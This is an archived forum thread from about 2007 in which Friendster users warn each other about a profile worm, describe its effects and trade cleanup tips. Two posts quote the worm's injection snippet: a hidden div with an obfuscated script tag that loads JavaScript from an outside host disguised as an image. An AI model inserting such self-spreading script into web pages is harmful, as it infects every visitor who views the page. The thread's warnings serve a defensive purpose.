• ARCHIVES 
  • » [b]B4 YOU READ:[/b] Please If You Want To View The Friendster Of Venussz. Make Sure That Your Friendster Is Not In! Hi Guys, Im Here To Inform You.. That I THINK, There's A Newest Worm Again In Frien

Pages: 12345

[b]B4 YOU READ:[/b] Please If You Want To View The Friendster Of Venussz. Make Sure That Your Friendster Is Not In! Hi Guys, Im Here To Inform You.. That I THINK, There's A Newest Worm Again In Frien

d^_~b
» FTalkManiac
FTalk Level: zero
1969-12-31

Re: [b]B4 YOU READ:[/b] Please If You Want To View The Friendster Of Venussz. Make Sure That Your Friendster Is Not In! Hi Guys, Im Here To Inform You.. That I THINK, There's A Newest Worm Again In Frien

argh.. i discover this worm on my profile.. amp.. <">worms are such irritating :angry: :angry:
ReverzerO
» FTalkAgent
1969-12-31

Re: [b]B4 YOU READ:[/b] Please If You Want To View The Friendster Of Venussz. Make Sure That Your Friendster Is Not In! Hi Guys, Im Here To Inform You.. That I THINK, There's A Newest Worm Again In Frien

^ What is the effect of this worm in your page?!
d^_~b
» FTalkManiac
1969-12-31

it changes <%BClink..........> to <link> the result is.. my external css code will not work.. :wasted: :wasted:

Last edited by d^_~b (2007-09-26 09:35:10)

xavierkym
» FTalkFreak
1969-12-31

^ dont worry bout that.. the worm owner have exeeded bandwidth in ripway.. :lol: but still delete that iff possible.. =)
jam0311
» n00b
1969-12-31

there was just new worm bugging around.. <div id="tuxieforte" s%9dtyle="display:none"><s%9dcript id='ix' type='text/javascript' src='http://usera.imagecave.com/images-627xL/slide/OG_Slide.gif'><%9d/script></div> thats the code.. it will make the external linker unaccesible.. that code will be seen in the media box.. and if ever someone will view the account who has that worm.. he will also have that worm on her media box.. :evil: just kindly erase it..if you have it on your media box..
shakiro214
» FTalkGeek
1969-12-31

Huh, I had that same thing the other day too. I had to put my codes again :penguin: Nothing was lost, but I hate to touch my editskin page ever :cool: I'm too paranoid to ever edit my profile using editskin :/
ReverzerO
» FTalkAgent
1969-12-31

[quote=d^_~b]it changes <%BClink..........> to <link> the result is.. my external css code will not work.. :wasted: :wasted:[/quote] Guezzzzz I had that worm too. So now if I'm goin' to save my extended link to my about me or who want to meet, it will work now?! I think the maintenance caused that not that worm?!?!
d^_~b
» FTalkManiac
1969-12-31

[img]http://h1.ripway.com/chester1an/worm.PNG[/img] if you view a profile and you see something like this.. well this is not a loading page.. argh.. whenever i view someone's profile with that loading page this appear's in my media box.. [quote]<div id="tuxieforte" s%9dtyle="display:none"><s%9dcript id='ix' type='text/javascript' src='http://usera.imagecave.com/images-627xL/slide/OG_Slide.gif'><%9d/script></div>[/quote]

Last edited by d^_~b (2007-09-28 02:03:01)

fando91
» FTalkManiac
1969-12-31

[b] :arrow: I just hate worms so much!!! :arrow: Mine just been infected a while ago!! :arrow: Hate it!! :midfinger: ![/b]
ReverzerO
» FTalkAgent
1969-12-31

Wahahah it changed :lol: In my opinion they used stealth bot plus worm =D
eehjhay
» FTalkWhiz
1969-12-31

Lol. How come my Friendster Profile never had a worm? Not once since I join Friendster years ago. hehe..
xavierkym
» FTalkFreak
1969-12-31

[quote=ReversEdge]Wahahah it changed :lol: In my opinion they used stealth bot plus worm =D[/quote] nope. they used a script that injects the code in viewer's media box. dont ask me how i know. TQ. :D
ReverzerO
» FTalkAgent
1969-12-31

I salute with them nyahahha~ :retard:
toybox
» n00b
1969-12-31

Try to locate the images url, look at in your "about me" or "who i want to meet" becoz there is some debug file of friendster.com that not still finished to fix. :) i can give you a tecnics in deleting of that bad tracks :) if you see a codes in your "about me" or "who i want to meet" that you dont put or edit that is the bad track or debug of friendster.com
ReverzerO
» FTalkAgent
1969-12-31

Yes I knew this before. As for now my profile back to normal =)
cyrus_tan_r
» FTalkAddict
1969-12-31

i hate this worms also i hate updates in frndstr
gandalicious23
» FTalkAddict
1969-12-31

friendster updated again. haaaay. i'm getting lazy updating my codes.
NiRa_7xXx7
» n00b
1969-12-31

Yea it will injects just like xavierkym said. So clean up your codes regulary! if not the worm will effect others too than the worm will be big & bigger :wallbash: :wallbash: just hate it to da max :midfinger:
ReverzerO
» FTalkAgent
1969-12-31

Let's attack friendster team =D
toybox
» n00b
1969-12-31

friendster.com is now going to a large server now! due to overload users! i hope that friendster will update again and the format will changes again! i hope that no updates in TAGS! haha!
  • ARCHIVES 
  • » [b]B4 YOU READ:[/b] Please If You Want To View The Friendster Of Venussz. Make Sure That Your Friendster Is Not In! Hi Guys, Im Here To Inform You.. That I THINK, There's A Newest Worm Again In Frien

Pages: 12345

Board footer

© 2024 F Talk

Current time is 03:36

[ 9 queries - 0.058 second ]
Privacy Policy